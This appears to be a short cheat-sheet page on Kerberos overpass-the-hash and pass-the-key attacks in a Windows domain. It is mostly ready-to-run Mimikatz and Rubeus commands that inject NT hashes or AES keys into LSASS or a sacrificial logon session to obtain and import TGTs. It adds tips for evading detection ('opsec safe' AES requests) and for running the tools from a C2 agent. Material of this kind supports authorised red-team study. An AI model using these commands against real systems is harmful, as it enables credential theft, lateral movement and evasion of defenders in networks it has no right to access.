Create a new process with dummy creds (Logon type 9), open the LSASS process and patch it with the supplied NT hash. This causes the normal Kerberos authentication process to kick off as normal as if the user had normally logged on, turning the supplied hash into a fully-fledged TGT:

Cmd > .\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::pth /user:snovvcrash /domain:megacorp.local /run:c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /ntlm:fc525c9683e8fe067095ba2ddc971889" "exit"

It also work for local accounts but for the reason that patching LSASS does not change the security information or user information for this process, the new credentials in LSASS can correctly be used only for network authentication and not for identifying the local user account associated with the process. (paraphrased from here)

That's why for local accounts such options as net use \\localhost\c$, WMI calls or PsExec can be considered.


Create a sacrificial process (Logon type 9), legitimately ask Kerberos for TGT, import it and interact with the process (need elevated context):

Cmd > .\Rubeus.exe asktgt /domain:megacorp.local /dc:dc1 /user:snovvcrash /password:Passw0rd! /createnetonly:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /show
Cmd > .\Rubeus.exe asktgt /domain:megacorp.local /dc:dc1 /user:snovvcrash /rc4:fc525c9683e8fe067095ba2ddc971889 /createnetonly:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /show

If operating Rubeus from a C2 agent, you can steal_token instead of using /show option.

Create a new process with dummy creds (Logon type 9) manually, then use Rubeus with user's NT hash to ask for a TGT and import it:

Cmd > runas /netonly /user:megacorp.local\snovvcrash cmd
Enter the password for megacorp.local\snovvcrash: dummy_Passw0rd!
Cmd > .\Rubeus.exe asktgt /domain:megacorp.local /dc:dc1 /user:snovvcrash /rc4:fc525c9683e8fe067095ba2ddc971889 /ptt

A more opsec safe approach is to use AES key (KeyType 0x12) instead of RC4-HMAC (KeyType 0x17) alongside with /opsec switch which instructs Rubeus not to do pre-auth (mimics standard Kerberos behavior):

Cmd > .\Rubeus.exe asktgt /domain:megacorp.local /dc:dc1 /user:snovvcrash /aes256:94b4d075fd15ba856b4b7f6a13f76133f5f5ffc280685518cad6f732302ce9ac /ptt /opsec

Last updated